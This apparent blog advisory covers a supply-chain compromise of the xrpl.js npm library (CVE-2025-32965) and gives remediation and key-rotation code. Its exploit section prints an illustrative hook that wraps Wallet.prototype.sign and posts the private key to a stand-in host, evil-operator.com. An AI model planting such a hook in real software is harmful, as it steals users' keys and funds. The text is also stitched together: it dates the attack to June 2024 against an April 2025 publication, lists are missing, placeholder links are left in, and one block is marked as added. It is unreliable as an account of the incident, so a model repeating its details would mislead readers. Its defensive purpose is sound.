In early June 2024, a major security incident rocked the XRP Ledger developer community. The popular JavaScript/TypeScript library, xrpl.js, was struck by a supply chain attack, exposing private keys to attackers in several compromised versions. This breach, now catalogued as CVE-2025-32965, marks an urgent warning for all users and developers: act now, or risk loss of funds.

This exclusive long read explains what happened, how the exploit worked, who is affected, and—most importantly—what you should do right now to secure your XRP assets.

What is xrpl.js?

xrpl.js is the official JavaScript/TypeScript client library for the XRP Ledger. It lets web apps, Node.js projects, and browser clients interact with the decentralized XRP network for payments, transactions, signing, and more. It's commonly used for:

If you installed or used any of these versions, your private keys are at risk.

Malicious code was inserted into the npm package, designed specifically to exfiltrate private keys and secrets used by applications. This is a direct result of a supply chain attack—where attackers target dependencies that developers trust rather than attacking end products.

How the Exploit Worked

The attacker injected code into affected xrpl.js builds that hooks into wallet-related API calls. As soon as the library is used to sign or submit a transaction, the malicious payload captures the wallet’s private key and surreptitiously sends it to a remote server controlled by attackers.

Malicious Snippet Example (Hypothetical)

Here's an illustrative (simplified) example of what such an injected payload could look like, hiding among legitimate package code:

// Maliciously added to handle wallet operations
const originalSign = Wallet.prototype.sign;
Wallet.prototype.sign = function(tx) {
  // Exfiltrate secret key
  fetch('https://evil-operator.com/report', {
    method: 'POST',
    body: JSON.stringify({ secret: this.privateKey })
  });
  return originalSign.call(this, tx);
};

Actual code in the wild may look different, but the tactic is the same: steal secrets and leak them silently.

- Wallet users whose applications depended on compromised xrpl.js releases.

- Businesses with servers or backend services running these versions—especially if they automated sweeping or signing operations.

If you have ever entered a secret, mnemonic, or private key into a wallet, script, or webapp using one of those versions, consider that secret compromised.

Stop Using Affected Versions Immediately

- Uninstall or remove xrpl.js versions 2.14.2, 4.2.1, 4.2.2, 4.2.3, and 4.2.4 from all environments.

Rotate All Keys and Secrets

- Generate new wallets/keys for all affected accounts.

- Transfer funds to secure addresses (generated using a safe, uncompromised tool or hardware wallet).

- If your account’s master key might be leaked, consider disabling it: first assign a regular key with a SetRegularKey transaction, then disable the master key with an AccountSet transaction. The regular key must be in place before the master key is disabled, or you lock yourself out of the account.

- Watch for announcement updates from:
  - XRPLF Security Notice *(Replace with actual advisory link)*
  - XRP Ledger Twitter
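The SetRegularKey and AccountSet steps above are easy to get wrong in order, and a result that looks like success can still be a `tec` failure recorded in the ledger. The script below is an added example, not from the original post and not part of xrpl.js: it builds the two transactions as plain objects so they can be reviewed offline, and `rotateKeys` submits them in the only safe order against a connected `xrpl.Client`, verifying on a validated ledger that the regular key is recorded before the master key is disabled. `ASF_DISABLE_MASTER` is the AccountSet `SetFlag` value for asfDisableMaster and `LSF_DISABLE_MASTER` is the matching bit in `account_data.Flags`; the addresses and result codes in the test are constructed samples.

```javascript
// Added example (not from the original post): retire a possibly leaked master key.
const ASF_DISABLE_MASTER = 4;           // AccountSet SetFlag value for asfDisableMaster
const LSF_DISABLE_MASTER = 0x00100000;  // account_data.Flags bit once the master key is disabled

// Transaction 1: point the account at a new signing key (signed by the still-enabled master key).
function buildSetRegularKeyTx(account, regularKeyAddress) {
  return { TransactionType: 'SetRegularKey', Account: account, RegularKey: regularKeyAddress };
}

// Transaction 2: disable the master key. Only safe once a regular key (or signer list) exists.
function buildDisableMasterTx(account) {
  return { TransactionType: 'AccountSet', Account: account, SetFlag: ASF_DISABLE_MASTER };
}

// The two-step plan as plain objects, so ordering and fields can be reviewed offline.
function planRotation(account, regularKeyAddress) {
  return [buildSetRegularKeyTx(account, regularKeyAddress), buildDisableMasterTx(account)];
}

// submitAndWait resolves for tec* results too (they are included in a ledger), so check meta.
function succeeded(response) {
  const meta = response && response.result && response.result.meta;
  return typeof meta === 'object' && meta !== null && meta.TransactionResult === 'tesSUCCESS';
}

function masterDisabled(accountFlags) {
  return (accountFlags & LSF_DISABLE_MASTER) !== 0;
}

// Live procedure. `client` is a connected xrpl.Client; `masterWallet` signs both steps;
// `regularKeyWallet` was generated on a clean machine and its seed stored offline.
async function rotateKeys(client, masterWallet, regularKeyWallet) {
  const account = masterWallet.classicAddress;
  const [setKeyTx, disableTx] = planRotation(account, regularKeyWallet.classicAddress);

  const r1 = await client.submitAndWait(setKeyTx, { wallet: masterWallet });
  if (!succeeded(r1)) throw new Error('SetRegularKey failed: ' + JSON.stringify(r1.result.meta));

  // Confirm the validated ledger records the new regular key before locking the master key out.
  const info = await client.request({ command: 'account_info', account, ledger_index: 'validated' });
  if (info.result.account_data.RegularKey !== regularKeyWallet.classicAddress) {
    throw new Error('RegularKey not present on validated ledger; not disabling master key');
  }

  const r2 = await client.submitAndWait(disableTx, { wallet: masterWallet });
  if (!succeeded(r2)) throw new Error('AccountSet failed: ' + JSON.stringify(r2.result.meta));

  const after = await client.request({ command: 'account_info', account, ledger_index: 'validated' });
  return masterDisabled(after.result.account_data.Flags);
}

module.exports = { planRotation, succeeded, masterDisabled, rotateKeys, ASF_DISABLE_MASTER, LSF_DISABLE_MASTER };
```

After `rotateKeys` returns `true`, every later transaction for the account must be signed with `regularKeyWallet` while keeping `Account` set to the original address; the old master seed can no longer authorize anything, which is the point.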

How to Rotate Your Keys (Code Example)

Here’s a sample script for transferring funds to a new secure wallet using updated xrpl.js (after upgrading safely):

const xrpl = require('xrpl');

async function main() {
  // Connect to a public XRPL server
  const client = new xrpl.Client('wss://s1.ripple.com');
  await client.connect();

  try {
    // Old (compromised) wallet
    const old_wallet = xrpl.Wallet.fromSeed('s...............');

    // New (safe) wallet generated with clean tools.
    // Record new_wallet.seed somewhere safe BEFORE moving funds, or they are unrecoverable.
    const new_wallet = xrpl.Wallet.generate();

    // Send XRP to the new wallet
    const payment = {
      TransactionType: "Payment",
      Account: old_wallet.classicAddress,
      Destination: new_wallet.classicAddress,
      Amount: xrpl.xrpToDrops(10) // Replace 10 with your balance minus the account reserve and the fee
    };

    // submitAndWait autofills Fee/Sequence, signs with old_wallet and waits for validation.
    // A tec* result is still recorded in a ledger, so check the result code explicitly.
    const tx = await client.submitAndWait(payment, { wallet: old_wallet });
    if (tx.result.meta.TransactionResult !== "tesSUCCESS") {
      throw new Error("Payment failed: " + tx.result.meta.TransactionResult);
    }
    console.log("Funds moved to new secure address:", new_wallet.classicAddress);
  } finally {
    await client.disconnect();
  }
}

// Top-level await is not available in a CommonJS script, so run the async body here.
main().catch((err) => { console.error(err); process.exit(1); });

*Make sure to double-check balance and leave enough for the transaction fee!*

More Detailed References

- xrpl.js NPM Package
- Official Incident Report (XRPLF Advisory) *(Update with real link when available)*
- How to Rotate XRP Ledger Keys
- Disable XRP Ledger Master Keys
- OWASP Supply Chain Attack Overview

Final Thoughts

Supply chain attacks like CVE-2025-32965 are among the hardest for developers and users to spot, exploiting trust in major software distributions. The XRPL community’s fast response likely saved millions in potential losses, but prevention is now your responsibility.

Consider moving to hardware wallets where possible.

*Don’t let a library vulnerability cost you your funds—review your keys and strengthen your security today.*

Timeline

Published on: 04/22/2025 21:15:45 UTC
Last modified on: 04/23/2025 14:08:13 UTC